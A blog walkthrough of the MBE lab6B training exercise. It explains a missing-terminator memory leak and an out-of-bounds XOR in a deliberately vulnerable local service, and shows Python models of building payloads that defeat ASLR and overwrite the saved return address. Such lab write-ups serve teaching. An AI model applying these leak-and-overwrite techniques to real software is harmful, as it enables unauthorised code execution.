The XOR madness of MBE's tricky lab6B - a walkthrough
This post is a continuation of my MBE (Modern Binary Exploitation) walkthrough series. For an introduction, please see the previous post: https://hackingiscool.pl/mbe-lab6c-walkthrough/.
A look at the target app
So let's get right to it. The source code of the target application can be found here: https://github.com/RPISEC/MBE/blob/master/src/lab06/lab6B.c. The lab6B.readme reveals that this time we are not dealing with a suid binary. Instead, we are supposed to compromise a service running on port 6642.
Let's see if we can interact with it from our MBE VM command line:
Nice, it's working.
Our target application is not actually capable of networking. This is covered by socat:
socat TCP-LISTEN:6642,reuseaddr,fork,su=lab6A EXEC:timeout 300 /levels/lab06/lab6B
To better understand how the target program behaves, and to make exploit development easier, let's compile our own version in /tmp.
The only change required is the hardcoded /home/lab6A/.pass path, since we are doing our development on the MBE VM using the lab6B account and do not have the privileges to read that file:
I just replaced it with pass.txt (the file needs to exist, be non-empty and readable for the program to work properly):
The source code overview
Now, the source code. Just like lab6C.c had its 'secret_backdoor()' function, we have a backdoor here as well (the login() function we will later point EIP at), so all we are gonna need is execution control:
Then we have the hash_pass() function. It takes two pointers to buffers (password and username) and XORs each byte of the password buffer with the corresponding byte from the username buffer. The crucial property here is that the XOR operation keeps going until a nullbyte is encountered at password[i]; no buffer size is ever checked:
If a nullbyte is encountered under username[i] first, the rest of the password is XOR-ed with a hardcoded value of 0x44.
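To make the two phases easier to follow, here is a minimal Python model of the behaviour described above. It is a sketch built from this description, not the original C code: the flat `mem` bytearray and the integer offsets standing in for the two pointers are assumptions made purely for illustration.

```python
def hash_pass(mem: bytearray, password: int, username: int) -> None:
    """Model of hash_pass(); password and username are offsets into mem."""
    i = 0
    # Phase 1: XOR with username bytes while neither side is a null byte.
    while mem[password + i] and mem[username + i]:
        mem[password + i] ^= mem[username + i]
        i += 1
    # Phase 2: whatever is left of the password gets the 0x44 pad.
    while mem[password + i]:
        mem[password + i] ^= 0x44
        i += 1


# Toy memory: username "ab" at offset 0, password "WXYZ" at offset 8.
mem = bytearray(16)
mem[0:2] = b"ab"
mem[8:12] = b"WXYZ"
hash_pass(mem, password=8, username=0)
hashed = bytes(mem[8:12])
print(hashed.hex())  # 363a1d1e
```

The first two password bytes are XOR-ed with 'a' and 'b', the remaining two with 0x44. Note that nothing in the function knows how large either buffer is.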
Then there's the lengthy load_pass() function, which simply reads the contents of the /home/lab6A/.pass file into the buffer referenced by its only argument:
Now, this is what the main() function looks like:
It loads the local user password into the secretpw buffer and hashes it with the hardcoded "lab6A" string (the target username). Then it calls the login_prompt() function, passing the original password size and the hash to it.
Then finally we have the login_prompt() function. It reads the username and the password into local buffers, using strncpy() with the destination buffer size as the limit to avoid an overflow. It then calls hash_pass() on the buffers and compares the result (memcmp()) with the password hash passed in as the second login_prompt() argument, making sure to compare exactly as many bytes as it should (pwsize):
The first vuln
And honestly, I could not figure out where the vulnerability was. So I peeked into Corb3nik's solution https://github.com/Corb3nik/MBE-Solutions/blob/master/lab6b/solution.py only to notice the following part:
By the way, the original version kept complaining about input arguments, so before I read the usage comment I simply modified it into a 'remote'-only variant (a hardcoded remote() connection to 127.0.0.1:6642): https://github.com/ewilded/MBE-snippets/blob/master/lab6B/solution.py. Either way, it works like a charm. Now let's find out how and why.
So, after sending the first set of credentials, the exploit parses the output from the application (p.recvline()) as a memory leak, right after encountering the "Authentication failed for user" string. Individual byte ranges are saved in variables named after the local variables stored on login_prompt()'s stack. This made me see the light and instantly revealed the first vulnerability - which by the way also makes the second vulnerability possible to exploit, but we'll get to that in due course.
The local readbuff buffer is 128 bytes long. Both username and password are 32 bytes long:
Now, what happens next is that fgets() reads a string from user input, saving it in the readbuff buffer. To make the user input saved in readbuff an actual string, fgets() will terminate it with a nullbyte. This means that if we provide, let's say, 60 characters of username, fgets() will make sure byte 61 is 0, so the string is terminated:
This itself is not an issue. However, what happens next is strncpy() blindly copying up to 32 bytes from readbuff to username. When the source string is 32 bytes or longer, strncpy() fills the entire destination and does not append a terminating nullbyte. The same goes for password.
This means that if we provide at least 32 bytes as both username and password, the two 32-byte buffers, username and password, form a contiguous 64-byte block of memory without a single nullbyte. Depending on the values stored next to it (in this case attempts and result, and anything that follows), the contiguous non-null memory block can be longer - and printable.
Every time the hash comparison fails, the address of the username buffer is passed to a printf() call:
Provided with a pointer to the username buffer and the %s format specifier, printf() will keep printing memory starting at username and will only stop once it encounters a nullbyte on its way. This is the memory leak that gives us the information required to defeat ASLR (as we must put the current, valid address of the login() function into EIP).
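The missing terminator and the resulting over-read can be reproduced with a small Python model. This is only a sketch: the `strncpy` and `printf_s` helpers imitate the C functions, the stack layout (username, password, then eight bytes of neighbouring data) is hypothetical, and hash_pass() is left out on purpose to isolate the first bug.

```python
def strncpy(mem: bytearray, dst: int, src: bytes, n: int) -> None:
    """Model of C strncpy(): copy at most n bytes, zero-pad only if src is shorter."""
    text = src.split(b"\x00", 1)[0][:n]
    mem[dst:dst + n] = text + b"\x00" * (n - len(text))


def printf_s(mem: bytearray, start: int) -> bytes:
    """What printf("%s") would emit: everything up to the first null byte."""
    return bytes(mem[start:mem.index(0, start)])


USERNAME, PASSWORD = 0, 32
neighbours = b"\xfe\xff\xff\xff\xff\xff\xff\xff"  # hypothetical non-null stack data
stack = bytearray(64) + neighbours + bytes(4)

# fgets() leaves a null-terminated line in readbuff: 60 characters plus newline.
strncpy(stack, USERNAME, b"B" * 60 + b"\n\x00", 32)
strncpy(stack, PASSWORD, b"C" * 60 + b"\n\x00", 32)
long_leak = printf_s(stack, USERNAME)

# A short username still gets its terminator (and zero padding) copied.
strncpy(stack, USERNAME, b"bob\n\x00", 32)
short_leak = printf_s(stack, USERNAME)

print(len(long_leak), short_leak)
```

With 32 or more input bytes in both fields, the "string" starting at username runs through password and into the neighbouring data, here 72 bytes in total. With a short username the read stops where it should.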
Running the app
Before we proceed any further, let's get a feel for how all this data is laid out on the stack.
Let's put our first breakpoint here (between the strncpy() and hash_pass() calls):
Which would be this place in login_prompt() (at offset 278, right after the second strncpy() call is complete):
We can set a breakpoint on an offset, without first loading the program and using a full address, like below:
The breakpoint is hit, so let's have a look at the stack and identify what's what:
To confirm whether the value we think is the saved RET is in fact the saved RET, let's simply check the address of the next instruction after the login_prompt() call:
Yup. So we know how data is aligned on the stack when hash_pass() is about to be called.
Fair enough, let's create a second breakpoint, right after the hash_pass() call, to see how it affects the values on the stack:
And once it's hit, we can see that the password (originally consisting of capital 'C's) was hashed with the username (capital 'B's), and so were the two integer values (attempts and result) and the stuff that follows them:
Even the trailing 0x80002f78 was changed to 0x80002e79 as a result of the XOR operation. The XOR stopped on the nullbyte in 0x80002e79, leaving the 0x80 part intact.
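The before/after values of that trailing word can be checked by hand. The sketch below assumes each byte was XOR-ed with 0x01 (that is 'C' XOR 'B'), which is what the two values quoted above suggest. The key byte is an inference, not something read from the debugger.

```python
import struct

word = bytearray(struct.pack("<I", 0x80002F78))  # little-endian: 78 2f 00 80
key = 0x43 ^ 0x42                                # 'C' XOR 'B' = 0x01 (assumed key)

for i in range(len(word)):
    if word[i] == 0:   # hash_pass() stops at the first null byte it reads
        break
    word[i] ^= key

result = struct.unpack("<I", word)[0]
print(hex(result))  # 0x80002e79
```

Only the two low bytes change. The null byte in the middle ends the loop before the 0x80 byte is reached.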
At this point I got really worried about my understanding of the issue. How are we supposed to leak any memory layout information, like the saved RET, the saved EBP or anything else revealing the current base address, if we hit a nullbyte earlier on our way? We are always going to hit one, since the saved RET contains a nullbyte whenever the code segment base address contains one:
Then I noticed that the code segment in fact has a non-null base (just like the other maps) when we attach to an already running process instead of starting it from gdb (if you know the reason for this behavior please let me know).
As my goal was to figure out the exploitation myself, using Corb3nik's exploit for clues only as a last resort, I tried to develop the rest of the code on my own, starting with this skeleton taken from his code:
Setting pwnlib's context.log_level variable to debug gives a great additional feedback channel during exploit troubleshooting and development.
Here's a sample run of this exploit skeleton (note the entire [DEBUG] output; the script itself does not print anything explicitly except for "The pid is: ..."):
By the way, because I wanted to attach gdb to the target process before inducing the out-of-bounds read (and carry on developing the exploit from that point), I made it print out the PID and pause, waiting for a key to be pressed:
This way we can conveniently attach to the process from a second console:
And the stack (the saved RET, i.e. the address of the next instruction after the login_prompt() call, is marked red):
The second vuln
Now let's see how the stack changed after the first hash_pass() call (breakpoint 2):
First, we have our username buffer (32 bytes of 0x42 value) intact. Then we have the password buffer. It's also 32 bytes, originally of the 0xff value we sent in our payload... now turned into 0xbd. The 32 bytes of password got XOR-ed with their corresponding username bytes: 0x42 XOR 0xff = 0xbd. So far so good.
But what happens next, when i becomes 32 and keeps incrementing because no nullbyte was encountered at either username[i] or password[i]? At that point username[32] points at password[0], username[33] points at password[1] and so on. And password[32] points at the first byte of attempts, password[33] points at the second byte of attempts and so on. XOR keeps XOR-ing.
Let's have a look at the two signed integer values (result and attempts), which previously consisted of 0xff bytes (one of them held 0xfffffffe). So, how did their bytes turn from 0xff into 0x42? Had they been XOR-ed with 0x42 (username), they would now be 0xbd, just like the password bytes. Had they been XOR-ed with the original 0xff password bytes, they would now be nullbytes (which we don't want, by the way), because any value XOR-ed with itself becomes 0. They were originally 0xff and became 0x42 because they were XOR-ed with 0xbd (to check what value they were XOR-ed with, we can simply XOR the current value with the old value, 0x42 XOR 0xff = 0xbd):
So, the bytes that follow the password buffer (including the two integers, saved EBP and the saved RET) got XOR-ed with the contents of the password buffer... after the password buffer was XOR-ed with the username buffer.
And this is how we attained the second vulnerability - which, as we can see, allows us to change the saved RET!
Look again, the saved RET got changed as well (marked blue):
Its original value was 0xb77cdf7e, now it's 0x0ac162c3. Again, we can run a simple test to see what value it got XOR-ed with:
Yup, it was 0xbd for every byte (0xbdbdbdbd).
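The same check fits in a few lines of Python, using only the two saved RET values quoted above. XOR-ing the old value with the new one gives back the key that was applied.

```python
old_ret = 0xB77CDF7E   # saved RET before hash_pass(), as quoted above
new_ret = 0x0AC162C3   # saved RET after hash_pass()

key = old_ret ^ new_ret
key_bytes = key.to_bytes(4, "little")

print(hex(key))            # 0xbdbdbdbd
print(hex(0x42 ^ 0xFF))    # 0xbd, the hashed password byte
```

Every byte of the key equals 0x42 XOR 0xff, so the saved RET was XOR-ed with the already hashed password buffer.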
So, the second vulnerability is an out-of-bounds XOR in the hash_pass() function.
It is an XOR with a buffer that we control, so it is effectively an out-of-bounds write (a XOR-chained stack-based buffer overflow).
And funnily, it has the same root cause, which is relying on whether or not a particular consecutive byte is null instead of enforcing a maximum size boundary for the write.
Understanding the exploitation process and implementing it
In order to trigger both the out-of-bounds read and the out-of-bounds XOR, we must provide 32 non-null bytes of username and then 32 non-null bytes of password. Also, no byte at username[i] can have its corresponding byte in password[i] equal to it (that would lead to the relevant password[i] becoming a nullbyte as a result of the XOR operation, cutting us off from the further bytes on the stack).
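These conditions are easy to get wrong when picking payload bytes, so a small checker can help. The helper below is hypothetical (it is not part of the exploit) and adds one assumption beyond the text: a newline inside the payload is also rejected, because fgets() stops reading at a newline.

```python
def payload_problems(username: bytes, password: bytes) -> list:
    """Return the reasons why this pair would break the XOR chain."""
    problems = []
    if len(username) < 32 or len(password) < 32:
        problems.append("both values need at least 32 bytes")
    for name, data in (("username", username), ("password", password)):
        if 0x00 in data:
            problems.append(name + " contains a null byte")
        if 0x0A in data:
            # Extra assumption: fgets() stops reading at a newline.
            problems.append(name + " contains a newline")
    # Only the first 32 bytes of each value end up in the stack buffers.
    for i, (u, p) in enumerate(zip(username[:32], password[:32])):
        if u == p:
            problems.append("byte %d is identical in both, XOR gives 0x00" % i)
    return problems


ok = payload_problems(b"B" * 32, b"\xff" * 32)
bad = payload_problems(b"B" * 32, b"\xff" * 31 + b"B")
print(ok)
print(bad)
```

The first pair passes. The second one is flagged because its last password byte equals the username byte at the same position.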
This way the following things will happen:
1) password will get XOR-ed with username.
2) the bytes on the stack following the just XOR-ed password buffer (attempts, result, login_prompt() parameters, saved EBP and saved RET) will get XOR-ed with the new contents of the password buffer - which is, again, what we provide as password then XOR-ed with what we provide as username.
3) Since this authentication attempt will fail, the printf() call will print out everything starting from the username buffer, through the XOR-ed password, to the rest of the values on the stack XOR-ed with the XOR-ed password, up until a nullbyte is encountered.
So we use the out-of-bounds printf() read to actually obtain, among others, the saved RET. All these values are XOR-ed with the result of the username XOR password operation.
At this point the program is in an incorrect state. The saved RET and saved EBP do not make sense. We will now have to trigger both vulnerabilities again with another authentication attempt, crafting the username and the password payloads in such a way that when the values on the stack (attempts and saved RET) are XOR-ed with the password buffer (which at that point will be the result of XOR between the username and the password we provide), they become the arbitrary values we WANT them to be.
Yes, in addition to the saved RET becoming the current address of the login() function, we also want to control the attempts value, so the while loop can end:
The login_prompt() function will not attempt to return until the loop ends. And that return is how we gain execution control via the saved RET overwrite.
What we need to do now is:
1) use the leaked values to calculate the login() address
2) craft the second username and password 32-byte payloads in such a way that the current values on the stack (a copy of which we already got via the leak), especially saved RET and attempts, become what we want them to be once XOR-ed with the password buffer. Keep in mind that the password buffer will first get XOR-ed with the username buffer, so we need to account for this order while preparing the payload.
It all boils down to applying the correct values in the correct order of XOR-ing.
Let's start from the first payload again.
This time we'll use 'C' (0x43) as username and 0x11 as password:
Now, reading the values from the leak:
We know they are XOR-ed with 0x43 ('C', the username) XOR-ed with 0x11 (the password), which is 0x52. Again, these values can be arbitrary as long as they meet the conditions mentioned above. Once they are picked, the decoding and encoding that follows depends on them.
We know that XOR-ing anything with the same value twice gives the original value back. So:
0x43 XOR 0x11 = 0x52
0x52 XOR 0x11 = 0x43
Knowing that hash_pass() encoded the stack variables with 0x52, we XOR them with 0x52 to make them make sense again:
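As a rough illustration of that decoding step, the sketch below undoes the single-byte XOR on one four-byte slice of the leak. The leaked value 0xe52e8d2c is hypothetical: it is simply the 0xb77cdf7e saved RET seen earlier in gdb, encoded with the 0x52 key.

```python
import struct

KEY = 0x43 ^ 0x11  # username byte XOR password byte = 0x52


def decode(leaked: bytes, key: int = KEY) -> bytes:
    """Undo the single-byte XOR that hash_pass() applied to the stack."""
    return bytes(b ^ key for b in leaked)


# Hypothetical 4-byte slice of the leak holding the XOR-ed saved RET.
xored_ret_bytes = struct.pack("<I", 0xE52E8D2C)
saved_ret = struct.unpack("<I", decode(xored_ret_bytes))[0]

print(hex(KEY))        # 0x52
print(hex(saved_ret))  # 0xb77cdf7e
```

The same `decode` call works for any other slice of the leak that was XOR-ed with the hashed password.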
OK, time for the second payload. This time we'll use 'D' (0x44) as username, only to emphasize that it can differ here.
Obtaining the offset of the login() function:
Calculate the current ASLR-ed address of the login() function by preserving the 20 most significant bits of the original saved RET and adding the fixed offset 0xaf4 to them:
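In Python this calculation could look as follows. The function name and the sample saved RET (the value seen earlier in gdb) are for illustration only. The mask and the 0xaf4 offset come from the description above.

```python
LOGIN_OFFSET = 0xAF4      # offset of login(), as quoted above
PAGE_MASK = 0xFFFFF000    # keeps the 20 most significant bits


def login_address(saved_ret: int) -> int:
    """Swap the low 12 bits of the decoded saved RET for login()'s offset."""
    return (saved_ret & PAGE_MASK) + LOGIN_OFFSET


new_ret = login_address(0xB77CDF7E)
print(hex(new_ret))  # 0xb77cdaf4
```

This relies on login() and the return address sharing the same upper 20 bits, which is what the step above assumes.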
Now crafting the payloads for saved RET and attempts. We want a value which, when XOR-ed with the currently messed up saved RET on the stack, turns it into the new_ret address. As we know the current value of the messed up saved RET (the xored_ret variable), we XOR it with new_ret and save the result in new_ret_payload. When hash_pass() XORs this value into the xored_ret sitting on the stack, the two XORs with xored_ret cancel each other out and the result equals new_ret (this is why I titled it "madness"):
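The cancellation is easier to trust once it is written out. The numbers below are hypothetical and continue the running example: xored_ret is 0xb77cdf7e encoded with the 0x52 key, and new_ret is the login() address derived from it.

```python
xored_ret = 0xE52E8D2C   # hypothetical leaked value: 0xb77cdf7e XOR 0x52525252
new_ret = 0xB77CDAF4     # hypothetical login() address

new_ret_payload = xored_ret ^ new_ret

# What hash_pass() effectively does to the saved RET on the second attempt:
after_hash = xored_ret ^ new_ret_payload

print(hex(new_ret_payload))  # 0x525257d8
print(hex(after_hash))       # 0xb77cdaf4
```

Since xored_ret appears twice in the chain, it drops out and only new_ret is left. In this example none of the payload bytes is 0x00, which matters because a nullbyte would stop the XOR chain early.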
Now the attempts value. We decode it with the 0x52 key from the first attempt, increment it by one (to get past the last, third iteration of the while loop instead of having to perform another dummy authentication attempt) and encode it back:
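Here is the same decode, increment and encode sequence as plain arithmetic. The leaked value is hypothetical: it assumes attempts held 0xfffffffe during the first attempt (the value seen earlier in gdb) and was encoded with the 0x52 key.

```python
KEY32 = 0x52525252     # the 0x52 key repeated over four bytes
MASK32 = 0xFFFFFFFF    # keep results within 32 bits

xored_attempts = 0xFFFFFFFE ^ KEY32        # hypothetical leaked value

decoded = xored_attempts ^ KEY32           # back to the real counter
bumped = (decoded + 1) & MASK32            # increment by one
new_attempts_payload = bumped ^ KEY32      # encode it back

print(hex(xored_attempts))        # 0xadadadac
print(hex(new_attempts_payload))  # 0xadadadad
```

The mask is only there because Python integers do not wrap around at 32 bits the way a C int does.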
Now, one last layer of encoding. Before sending, we need to XOR everything with the username value we chose for the second attempt, so that the hash_pass() call XOR-ing the password with it reverses this process, making those values ready to be XOR-ed against the rest of the stack:
And lastly, we assemble the payload, fill it up to 32 bytes with some arbitrary character (e.g. 'E') and send it:
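To see all the layers working together, here is a self-contained simulation of both attempts on a modeled stack. It is a sketch under loud assumptions, not the real exploit: the layout (username, password, then attempts, result, saved EBP and saved RET back to back), the offsets ATT and RET and the stack values are hypothetical, and the loop is assumed to have the form while(attempts++), so the stored counter is incremented between the two attempts.

```python
import struct

USER, PASS, TAIL = 0, 32, 64      # offsets in the modeled stack
ATT, RET = 0, 12                  # hypothetical offsets inside the tail
KEY1 = 0x43 ^ 0x11                # first attempt: 'C' XOR 0x11 = 0x52
USER2 = 0x44                      # second attempt username byte, 'D'


def hash_pass(mem, password, username):
    i = 0
    while mem[password + i] and mem[username + i]:
        mem[password + i] ^= mem[username + i]
        i += 1
    while mem[password + i]:
        mem[password + i] ^= 0x44
        i += 1


def attempt(mem, username, password):
    """One loop iteration: fill both buffers, hash, return the %s leak."""
    mem[USER:USER + 32] = username
    mem[PASS:PASS + 32] = password
    hash_pass(mem, PASS, USER)
    return bytes(mem[USER:mem.index(0, USER)])


def word(data, offset):
    return struct.unpack_from("<I", data, offset)[0]


def xor_word(value, key_byte):
    return value ^ (key_byte * 0x01010101)


# attempts, result, saved EBP, saved RET (hypothetical values), then nulls.
tail = struct.pack("<4I", 0xFFFFFFFE, 0xFFFFFFFF, 0xBFA1F6C8, 0xB77CDF7E)
stack = bytearray(64) + tail + bytes(4)

leak = attempt(stack, b"C" * 32, b"\x11" * 32)
xored_attempts = word(leak, TAIL + ATT)
xored_ret = word(leak, TAIL + RET)

# Assumption: the loop is while(attempts++), so the stored value is bumped here.
struct.pack_into("<I", stack, TAIL + ATT, (xored_attempts + 1) & 0xFFFFFFFF)

new_ret = (xor_word(xored_ret, KEY1) & 0xFFFFF000) + 0xAF4
new_ret_payload = xored_ret ^ new_ret
bumped = (xor_word(xored_attempts, KEY1) + 1) & 0xFFFFFFFF
new_attempts_payload = xor_word(bumped, KEY1)

# Last layer: pre-XOR with the second username, pad the rest with 'E'.
password = bytearray(b"E" * 32)
struct.pack_into("<I", password, ATT, xor_word(new_attempts_payload, USER2))
struct.pack_into("<I", password, RET, xor_word(new_ret_payload, USER2))

attempt(stack, bytes([USER2]) * 32, bytes(password))
final_attempts = word(stack, TAIL + ATT)
final_ret = word(stack, TAIL + RET)
print(hex(final_attempts), hex(final_ret))  # 0x0 0xb77cdaf4
```

In this model the second attempt leaves attempts at 0 and the saved RET pointing at the computed login() address, while result and saved EBP are scrambled by the 'E' filler. The real offsets and values have to come from the leak and the debugger, as described above.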
And here we go. Triggering the leak and the first out-of-bounds XOR:
Receiving the leak:
Sending the second authentication attempt payload:
And we're done:
The full source code with comments can be found here: